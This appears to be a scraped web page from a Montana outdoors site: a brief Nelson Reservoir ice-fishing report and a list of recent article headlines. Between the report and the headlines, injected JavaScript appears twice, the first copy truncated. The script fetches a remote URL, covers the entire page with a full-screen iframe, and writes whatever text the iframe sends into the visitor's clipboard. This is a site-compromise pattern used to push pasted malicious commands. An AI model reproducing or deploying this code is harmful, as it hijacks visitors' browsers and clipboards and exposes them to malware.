AA: Nelson Reservoir Ice Fishing Report
montanaoutdoor
·
February 10, 2025
We received a fishing report from an angler that would like to remain Anonymous from Nelson Reservoir. He went to Nelson Reservoir and was able to catch 25 nice perch. He was using glow plastic Helgamite fishing in
22 inches of ice.
Here are a few pictures he sent:


if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement("iframe");
iframe.src = url;
iframe.style.position = "fixed";
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = "hidden";
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})(); -->
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === "undefined") {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement("iframe");
iframe.src = url;
iframe.style.position = "fixed";
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = "hidden";
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Montana Outdoor Weekly Pulse
Montana's outdoor week, in your inbox at 7am Friday.
Most Recent
Conservation
When Game Wardens Come Knocking: The Real Price of Poaching in Montana
Aug 26, 2026 · montanaoutdoor
Hunting
Why Just Knowing How to Shoot Does Not Always Make You a Safe Hunter
Aug 26, 2026 · Angela Montana
App
Your Montana Archery Elk Checklist: What to Verify Before September 1
Aug 26, 2026 · montanaoutdoor
Guns
When a Whistle Won’t Cut It: The Return of the Backcountry Hand Cannon
Aug 25, 2026 · Angela Montana
Wolf
Spicy Red Riding Hood: When a Yellowstone Wolf Took Some Bear Spray to the Face
Aug 25, 2026 · Angela Montana
Recipes
Smoked Salmon Cream Cheese Bites: The Appetizer That Disappears Fast
Aug 25, 2026 · Angela Montana
Events
Ready, Aim, Trade: The Lewistown Gun Show Coming to Fergus County
Aug 25, 2026 · Angela Montana
Mack Days
2026 Fall Mack Days Begins September 10
Aug 25, 2026 · Angela Montana
Montana Fish Wildlife & Parks
Madison County FWP lands now under Stage I fire restrictions
Aug 24, 2026 · montanaoutdoor
FWP
Your Input Needed for Montana’s 2026-2027 Ice Fishing Season
Aug 24, 2026 · Angela Montana
Hunting
How Much Can a Grizzly Bear Lift? The Answer Should Change How You Hunt and Hike in Montana
Aug 24, 2026 · montanaoutdoor
Recipes
Wild Turkey Goulash
Aug 24, 2026 · Angela Montana